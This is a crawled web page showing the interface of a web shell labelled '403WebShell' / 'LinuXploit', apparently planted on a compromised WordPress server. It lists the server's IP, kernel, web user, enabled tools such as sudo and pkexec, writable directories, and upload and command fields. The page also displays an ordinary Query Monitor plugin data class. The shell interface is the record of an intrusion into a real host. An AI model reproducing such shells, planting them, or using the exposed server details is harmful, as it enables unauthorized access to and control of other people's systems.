Uname:Linux ip-11-115-0-196 6.8.0-1039-aws #41~22.04.1-Ubuntu SMP Thu Sep 11 10:54:48 UTC 2025 x86_64

403WebShell
403Webshell
Server IP : 13.126.101.145  /  Your IP : 216.73.217.87
Web Server : Apache/2.4.52 (Ubuntu)
System : Linux ip-11-115-0-196 6.8.0-1039-aws #41~22.04.1-Ubuntu SMP Thu Sep 11 10:54:48 UTC 2025 x86_64
User : www-data ( 33)
PHP Version : 8.3.17
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : ON
Directory :  /var/www/html/rentals_updated/wp-content/plugins/query-monitor/data/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/html/rentals_updated/wp-content/plugins/query-monitor/data/environment.php
<?php declare(strict_types = 1);
/**
 * Environment data transfer object.
 *
 * @package query-monitor
 */

class QM_Data_Environment extends QM_Data {
	/**
	 * @TODO data class
	 * @var array<string, mixed>
	 * @phpstan-var array{
	 *   variables: array<string, string|null>,
	 *   version: string|false,
	 *   sapi: string|false,
	 *   user: string,
	 *   old: bool,
	 *   extensions: array<string, string>,
	 *   error_reporting: int,
	 *   error_levels: array<string, bool>,
	 * }
	 */
	public $php;

	/**
	 * @TODO data class
	 * @var array<string, mixed>
	 * @phpstan-var array{
	 *   info: array{
	 *     server-version: string,
	 *     extension: string|null,
	 *     client-version: string|null,
	 *     user: string,
	 *     host: string,
	 *     database: string,
	 *   },
	 *   vars: array<string, bool|string>,
	 *   variables: list<stdClass>,
	 * }
	 */
	public $db;

	/**
	 * @TODO data class
	 * @var array<string, mixed>
	 * @phpstan-var array{
	 *   version: string,
	 *   environment_type: string,
	 *   development_mode?: string,
	 *   constants: array<string, string>,
	 * }>
	 */
	public $wp;

	/**
	 * @TODO data class
	 * @var array<string, mixed>
	 * @phpstan-var array{
	 *   name: string,
	 *   version: string|null,
	 *   address: string|null,
	 *   host: string|null,
	 *   OS: string|null,
	 *   arch: string|null,
	 *   basicauth: 'true'|'false',
	 * }>
	 */
	public $server;
}

Youez - 2016 - github.com/yon3zu
LinuXploit